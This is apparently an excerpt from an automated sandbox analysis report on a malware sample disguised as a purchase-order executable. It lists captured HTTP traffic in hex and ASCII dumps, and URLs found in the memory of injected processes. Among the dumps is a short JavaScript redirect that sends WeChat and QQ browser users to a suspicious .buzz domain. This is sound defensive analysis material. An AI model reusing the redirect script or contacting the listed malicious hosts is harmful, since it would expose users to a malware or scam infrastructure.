63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a Data Ascii: 7c9a<!DOCTYPE html><html lang="en-US" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /><link rel="profile" href="http:
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 12 Dec 2024 20:57:57 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-12T20:58:02.2635220Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:58:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXHEKA1dPN3EQEVTjcac%2Bg%2BBetujXOLh3AFwT0PWbgmAo0eqzHKnRP9wBcPNV1IWwbnSand4F1IgHf1Zp312WjzJgPnvOUh26Lmh0g9ago2HO2pOr92MBTxW4vM51PitNhH5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f10a231ebfdb0cf-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114529&min_rtt=114529&rtt_var=57264&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=644&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 36 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac d4 4f 6b 13 41 14 00 f0 fb 7e 8a 21 97 24 07 67 89 39 58 4c 13 51 cf 45 82 82 e7 c9 ee 4b 32 ed 76 66 33 33 9b 4d ea 06 3c 28 a6 7f d4 16 7a 50 69 c1 8a d0 1e 24 0a 12 2a 62 f4 cb b8 f9 73 f2 2b c8 6c 36 35 84 2d 86 d2 cb b2 fb de be 79 6f 7f 33 ec aa b4 04 75 15 52 6d 17 8a 29 05 2d 65 ae 93 26 99 46 53 25 03 21 84 6a dc 07 ab 4e 54 26 5b 88 9e ab 1e b3 14 e5 6c 2e 81 9e 44 19 84 9a 44 20 8f a0 22 62 a4 49 6b 44 71 81 3d 09 e2 6e 0d 98 2a cc bd 43 e5 63 a0 2d ca 50 11 79 04 53 66 43 eb 41 35 93 5e a3 96 e0 6b 20 25 b0 1a 88 74 16 95 d0 8d dc ac ce 34 d1 f0 cd e7 f0 67 ef f7 af 93 61 ff f5 f8 b4 1b be 3d 8b 73 b4 8a 32 b3 35 f5 34 3e 65 36 f7 b1 c3 2d a2 47 c5 75 01 55 54 44 e9 ba 52 ae bc 6d 9a 92 2a c0 d4 cd e5 57 b0 c5 37 4d df f7 f1 7a 5b d6 21 b7 82 2b de d6 56 ba a0 bb 4d 5b 8d cf bf 8e 07 9f e2 3e 1d 63 7a 5d 35 a7 44 25 63 75 29 c1 46 c3 71 1a 09 80 71 fc 0a 7e 51 e5 02 5f b9 7c 4f 70 5f 5e 22 57 2e 27 ab 45 2b fd 0f 6d 59 b3 72 f9 7a bc 3c 22 36 92 bc a6 f1 ab 78 e9 ca 45 2f 1d 4b 3e 65 1f bf 85 cf 77 2f f1 d2 55 d7 e6 a5 17 5b 8e ac 64 5c 40 08 b0 a9 00 4b 3d e2 f7 b9 d0 37 0f a9 82 88 25 02 99 09 24 bb a0 20 98 0b 37 81 d9 5c e8 58 fc 39 dc 05 41 0a 86 fe 56 93 30 5b 70 6a 07 3e 54 b8 0c a8 5b e7 0c 02 ea 12 3b a0 2e b7 83 8a 43 ac 8d 0a 08 d1 0e 28 6c f2 0a 75 20 88 ca d1 26 65 d4 a4 58 81 Data Ascii: 264OkA~!$g9XLQEK2vf33M<(zPi$*bs+l65-yo3uRm)-e&FS%!jNT&[l.DD "bIkDq=n*Cc-PySfCA5^k %t4ga=s254>e6-GuUTDRm*W7Mz[!+VM[>cz]5D%cu)Fqq~Q_|Op_^"W.'E+mYrz<"6xE/K>ew/U[d\@K=7%$ 7\X9AV0[pj>T[;.C(lu &eX
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:58:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rWyklwtTKzJeSATVvAr8be2jmCSNT7QKNIvkJ8jMC%2BwyUmMbhQa7jT0uQUPp21%2FZ3CXnAsL7idT7CbEpwC9n8fTye2NJGsOiLEYoxP4mjoSiIEU8KJ6VIg%2BotUWUTNVO%2BIcg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f10a2426a9d6747-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=113978&min_rtt=113978&rtt_var=56989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=664&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 36 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac d4 4f 6b 13 41 14 00 f0 fb 7e 8a 21 97 24 07 67 89 39 58 4c 13 51 cf 45 82 82 e7 c9 ee 4b 32 ed 76 66 33 33 9b 4d ea 06 3c 28 a6 7f d4 16 7a 50 69 c1 8a d0 1e 24 0a 12 2a 62 f4 cb b8 f9 73 f2 2b c8 6c 36 35 84 2d 86 d2 cb b2 fb de be 79 6f 7f 33 ec aa b4 04 75 15 52 6d 17 8a 29 05 2d 65 ae 93 26 99 46 53 25 03 21 84 6a dc 07 ab 4e 54 26 5b 88 9e ab 1e b3 14 e5 6c 2e 81 9e 44 19 84 9a 44 20 8f a0 22 62 a4 49 6b 44 71 81 3d 09 e2 6e 0d 98 2a cc bd 43 e5 63 a0 2d ca 50 11 79 04 53 66 43 eb 41 35 93 5e a3 96 e0 6b 20 25 b0 1a 88 74 16 95 d0 8d dc ac ce 34 d1 f0 cd e7 f0 67 ef f7 af 93 61 ff f5 f8 b4 1b be 3d 8b 73 b4 8a 32 b3 35 f5 34 3e 65 36 f7 b1 c3 2d a2 47 c5 75 01 55 54 44 e9 ba 52 ae bc 6d 9a 92 2a c0 d4 cd e5 57 b0 c5 37 4d df f7 f1 7a 5b d6 21 b7 82 2b de d6 56 ba a0 bb 4d 5b 8d cf bf 8e 07 9f e2 3e 1d 63 7a 5d 35 a7 44 25 63 75 29 c1 46 c3 71 1a 09 80 71 fc 0a 7e 51 e5 02 5f b9 7c 4f 70 5f 5e 22 57 2e 27 ab 45 2b fd 0f 6d 59 b3 72 f9 7a bc 3c 22 36 92 bc a6 f1 ab 78 e9 ca 45 2f 1d 4b 3e 65 1f bf 85 cf 77 2f f1 d2 55 d7 e6 a5 17 5b 8e ac 64 5c 40 08 b0 a9 00 4b 3d e2 f7 b9 d0 37 0f a9 82 88 25 02 99 09 24 bb a0 20 98 0b 37 81 d9 5c e8 58 fc 39 dc 05 41 0a 86 fe 56 93 30 5b 70 6a 07 3e 54 b8 0c a8 5b e7 0c 02 ea 12 3b a0 2e b7 83 8a 43 ac 8d 0a 08 d1 0e 28 6c f2 0a 75 20 88 ca d1 26 65 Data Ascii: 26eOkA~!$g9XLQEK2vf33M<(zPi$*bs+l65-yo3uRm)-e&FS%!jNT&[l.DD "bIkDq=n*Cc-PySfCA5^k %t4ga=s254>e6-GuUTDRm*W7Mz[!+VM[>cz]5D%cu)Fqq~Q_|Op_^"W.'E+mYrz<"6xE/K>ew/U[d\@K=7%$ 7\X9AV0[pj>T[;.C(lu &e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:58:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPFmB9TyUHDvEO3SsOWw2MxH17SLqb9DQSlrhW78cCYwmTtGhRbeiayXshP38wSwyYJb9a7kPsJiHqj4sCatiDgyUNPABMrIRTeTrL9ddtZr7xTLLqOlU%2BqVW4d8b%2Fb%2BZYLu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f10a252ed3bbfa0-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114262&min_rtt=114262&rtt_var=57131&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7813&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 36 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac d4 4f 6b 13 41 14 00 f0 fb 7e 8a 21 97 24 07 67 89 39 58 4c 13 51 cf 45 82 82 e7 c9 ee 4b 32 ed 76 66 33 33 9b 4d ea 06 3c 28 a6 7f d4 16 7a 50 69 c1 8a d0 1e 24 0a 12 2a 62 f4 cb b8 f9 73 f2 2b c8 6c 36 35 84 2d 86 d2 cb b2 fb de be 79 6f 7f 33 ec aa b4 04 75 15 52 6d 17 8a 29 05 2d 65 ae 93 26 99 46 53 25 03 21 84 6a dc 07 ab 4e 54 26 5b 88 9e ab 1e b3 14 e5 6c 2e 81 9e 44 19 84 9a 44 20 8f a0 22 62 a4 49 6b 44 71 81 3d 09 e2 6e 0d 98 2a cc bd 43 e5 63 a0 2d ca 50 11 79 04 53 66 43 eb 41 35 93 5e a3 96 e0 6b 20 25 b0 1a 88 74 16 95 d0 8d dc ac ce 34 d1 f0 cd e7 f0 67 ef f7 af 93 61 ff f5 f8 b4 1b be 3d 8b 73 b4 8a 32 b3 35 f5 34 3e 65 36 f7 b1 c3 2d a2 47 c5 75 01 55 54 44 e9 ba 52 ae bc 6d 9a 92 2a c0 d4 cd e5 57 b0 c5 37 4d df f7 f1 7a 5b d6 21 b7 82 2b de d6 56 ba a0 bb 4d 5b 8d cf bf 8e 07 9f e2 3e 1d 63 7a 5d 35 a7 44 25 63 75 29 c1 46 c3 71 1a 09 80 71 fc 0a 7e 51 e5 02 5f b9 7c 4f 70 5f 5e 22 57 2e 27 ab 45 2b fd 0f 6d 59 b3 72 f9 7a bc 3c 22 36 92 bc a6 f1 ab 78 e9 ca 45 2f 1d 4b 3e 65 1f bf 85 cf 77 2f f1 d2 55 d7 e6 a5 17 5b 8e ac 64 5c 40 08 b0 a9 00 4b 3d e2 f7 b9 d0 37 0f a9 82 88 25 02 99 09 24 bb a0 20 98 0b 37 81 d9 5c e8 58 fc 39 dc 05 41 0a 86 fe 56 93 30 5b 70 6a 07 3e 54 b8 0c a8 5b e7 0c 02 ea 12 3b a0 2e b7 83 8a 43 ac 8d 0a 08 d1 0e 28 6c f2 0a 75 20 88 ca d1 26 65 d4 Data Ascii: 26eOkA~!$g9XLQEK2vf33M<(zPi$*bs+l65-yo3uRm)-e&FS%!jNT&[l.DD "bIkDq=n*Cc-PySfCA5^k %t4ga=s254>e6-GuUTDRm*W7Mz[!+VM[>cz]5D%cu)Fqq~Q_|Op_^"W.'E+mYrz<"6xE/K>ew/U[d\@K=7%$ 7\X9AV0[pj>T[;.C(lu &e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:58:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vskf4lkCHeII0L%2B2FQp4QBUzM9ZlPEIp%2BfLNuJt%2FIiAxjKtjkUTY7kpqvSaFYNmfUcuUX74z4EDJ7K%2BOk74FhN6SK3JnqlLOKt9Dq6I%2BsG4gOk0Ihxkc%2B3sDp4eq2O%2Bq%2Fg7Q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f10a2636a2553da-ATLalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114177&min_rtt=114177&rtt_var=57088&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=382&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 63 62 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 67 6f 77 65 63 68 61 74 28 29 3b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 6f 77 65 63 68 61 74 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 75 61 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 0a 20 20 20 20 20 20 76 61 72 20 69 73 57 65 69 78 69 6e 20 3d 20 75 61 2e 69 6e 64 65 78 4f 66 28 27 4d 69 63 72 6f 4d 65 73 73 65 6e 67 65 72 27 29 20 3e 20 2d 31 3b 0a 20 20 20 20 20 20 2f 2f 20 e6 98 af e5 be ae e4 bf a1 e6 b5 8f e8 a7 88 e5 99 a8 0a 20 20 20 20 20 20 69 66 20 28 69 73 57 65 69 78 69 6e 29 20 7b 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 73 69 74 65 2e 69 70 31 33 38 2e 63 6f 6d 2f 77 77 77 2e 6a 79 73 68 65 31 38 2e 62 75 7a 7a 27 3b 20 2f 2f 20 e5 be ae e4 bf a1 e8 b7 b3 e8 bd ac 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 67 6f 71 71 6c 6c 71 28 29 3b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 6f 71 71 6c 6c 71 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 75 61 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 0a 20 20 20 20 20 20 76 61 72 20 69 73 71 71 6c 6c 71 20 3d 20 75 61 2e 69 6e 64 65 78 4f 66 28 27 51 51 Data Ascii: 5cb<script type="text/javascript"> gowechat(); function gowechat() { var ua = navigator.userAgent; var isWeixin = ua.indexOf('MicroMessenger') > -1; // if (isWeixin) {window.location.href = 'https://site.ip138.com/www.jyshe18.buzz'; // } }</script><script type="text/javascript"> goqqllq(); function goqqllq() { var ua = navigator.userAgent; var isqqllq = ua.indexOf('QQ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Dynamic Http ServerX-Ratelimit-Limit: 101X-Ratelimit-Remaining: 100X-Ratelimit-Reset: 1Date: Thu, 12 Dec 2024 20:58:51 GMTContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Dynamic Http ServerX-Ratelimit-Limit: 101X-Ratelimit-Remaining: 100X-Ratelimit-Reset: 1Date: Thu, 12 Dec 2024 20:58:53 GMTContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Dynamic Http ServerX-Ratelimit-Limit: 101X-Ratelimit-Remaining: 100X-Ratelimit-Reset: 1Date: Thu, 12 Dec 2024 20:58:56 GMTContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Dynamic Http ServerX-Ratelimit-Limit: 101X-Ratelimit-Remaining: 100X-Ratelimit-Reset: 1Date: Thu, 12 Dec 2024 20:58:59 GMTContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:59:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:59:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:59:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:59:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: PO 1202495088.exe, 00000001.00000002.1121146600.0000000070191000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
                Source: svchost.exe, 00000005.00000002.2811942456.0000019712B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: svchost.exe, 00000005.00000002.2811942456.0000019712B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: svchost.exe, 00000005.00000002.2811469302.0000019712A43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2509735525.0000019712A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: svchost.exe, 00000005.00000003.1202825836.000001971AC00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/update2/actxsdodvxbjblyjfcbcbc7srcwa_1.3.36.242/GoogleUpda
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007D3C000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005A8C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://pc.72.chat/dy/?www.jyshe18.buzz
                Source: qmgr.db.5.drString found in binary or memory: http://r4---sn-5hnekn7k.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93
                Source: qmgr.db.5.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93.0.457
                Source: qmgr.db.5.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/aciwgjnovhktokhzyboslawih45a_2700/jflook
                Source: qmgr.db.5.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/acze3h5f67uhtnjsyv6pabzn277q_298/lmelgle
                Source: qmgr.db.5.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/dp66roauucji6olf7ycwe24lea_6869/hfnkpiml
                Source: PO 1202495088.exe, 00000001.00000002.1113946631.0000000003570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: cttune.exe, 0000000D.00000002.5167744206.0000000005A8C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://site.ip138.com/www.jyshe18.buzz
                Source: qmgr.db.5.drString found in binary or memory: http://storage.googleapis.com/update-delta/ggkkehgbnfjpeggfpleeakpidbkibbmn/2021.9.13.1142/2021.9.7.
                Source: qmgr.db.5.drString found in binary or memory: http://storage.googleapis.com/update-delta/jamhcnnkihinmdlkakkaopbjbbcngflc/96.0.4648.2/96.0.4642.0/
